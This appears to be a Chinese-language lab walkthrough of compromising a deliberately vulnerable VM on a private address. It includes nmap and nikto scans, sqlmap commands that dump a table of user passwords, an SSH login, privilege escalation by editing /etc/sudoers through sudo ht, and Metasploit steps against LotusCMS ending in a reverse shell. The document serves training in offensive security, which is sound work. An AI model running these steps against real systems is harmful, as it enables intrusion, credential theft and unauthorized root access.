一、信息收集

1.靶机IP发现，sudo arp-scan -l

2.nmap端口扫描nmap -T4 -A -v 192.168.65.136

22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

3.nikto目录扫描nikto -host 192.168.65.136

+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 15:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7914 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2021-03-17 06:32:14 (GMT-4) (33 seconds)

4.awvs漏扫

5.查看网页

二、漏洞发现利用

1.sql注入http://192.168.65.136/gallery/gallery.php?id=1

（1）sqlmap 跑数据库sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 --dbs --batch

（2）查看gallery里的表sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery --tables --batch

（3）sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery -T dev_accounts --columns --batch

（4）sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery -T dev_accounts -C username,password --dump --batch

+------------+---------------------------------------------+
| username | password |
+------------+---------------------------------------------+
| dreg | (Mast3r) |
| loneferret | (starwars) |
+------------+---------------------------------------------+

（5）sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery -T gallarific_users --columns --batch

（6）sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery -T gallarific_users -C username,password --dump --batch

2.提权

（1）因为靶机开启了22端口，我们用前面sqlmap跑出的账户密码尝试登陆ssh admin@192.168.65.136

• admin用户登陆失败，登陆loneferret用户ssh loneferret@192.168.65.136

• loneferret登陆成功，但是不是root权限

（2）查看当前目录下的文件， 发现报错Error opening terminal: xterm-256color

（3） 执行命令export TERM=xterm-color，然后再打开htsudo ht（ht是一个编辑器，sudo使用root权限打开的编辑器）

（4）打开ht后，需要打开/etc/sudoers给当前账号加上以root用户执行/bin/bash的权限，根据底下菜单栏，按F3打开文件

（5）按F3后输入/etc/sudoers回车，在loneferret这一行的末尾加上,/bin/bash，按F2保存，然后退出ht

（6）接着输入sudo /bin/bash，便能成功提权

3.另一个漏洞之LotusCMS漏洞

（1）msf查询LotusCMS漏洞search LotusCMS，设置rhostset rhost 192.168.65.136,再设置uriset uri /,然后show options查看设置好没有

（2）漏洞利用，反弹shell